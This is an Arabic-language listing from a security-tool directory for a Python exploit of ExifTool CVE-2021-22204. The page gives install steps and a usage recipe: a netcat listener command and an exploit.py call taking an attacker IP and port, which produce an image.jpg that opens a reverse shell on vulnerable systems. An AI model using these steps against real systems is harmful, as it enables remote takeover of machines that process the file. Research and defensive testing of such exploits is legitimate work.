Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mr-tuhin/cve-2021-22204-exiftool
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmr-tuhin/cve-2021-22204-exiftool

CVE-2021-22204-exiftool

استغلال Python لثغرة CVE-2021-22204 في ExifTool، يقوم بتوليد صورة خبيثة تُطلق قشرة عكسية عند معالجتها بواسطة الإصدارات المعرّضة للخطر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
9223منذ 4 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2021-22204-exiftool

استغلال بلغة Python لثغرة CVE-2021-22204 في أداة Exiftool.

فيديو تعليمي

يوتيوب

    404 غير موجود

المتطلبات

python3 python3-pip djvulibre-bin exiftool

تثبيت المتطلبات

دبيان

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

أوبونتو

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

آرتش لينكس

    pacman -S djvulibre libimage-exiftool-perl python python-pip

كالي لينكس

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

فيدورا

    dnf install djvulibre libimage-exiftool-perl python-minimal python-pip

نظام OS X

    brew install djvulibre exiftool python

راسبيان

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

طريقة التشغيل:

تثبيت متطلبات بايثون

    sudo pip install -r requirements.txt

تشغيل شل عكسي باستخدام netcat

    nc -nvlp 4444

منح صلاحية التنفيذ

    chmod +x exploit.py

تشغيل البرنامج

    python3 exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك} 
    

أو

    ./exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك}

مثال

    python3 exploit.py 192.168.0.1 4444
    

أو

    ./exploit.py 192.168.0.1 4444

اسم ملف الإخراج هو

    image.jpg
    

حول الثغرة

تم اكتشاف ثغرة CVE-2021-22204 والإبلاغ عنها بواسطة William Bowling. (@wcbowling)

تم إنشاء هذا الاستغلال من خلال دراسة تصحيح exiftool بعد الإبلاغ عن الثغرة بالفعل.

وسيؤدي ملف image.jpg إلى تفعيل الثغرة عند فتحه باستخدام إصدار exiftool المعرض للثغرة.

تنزيل الأداة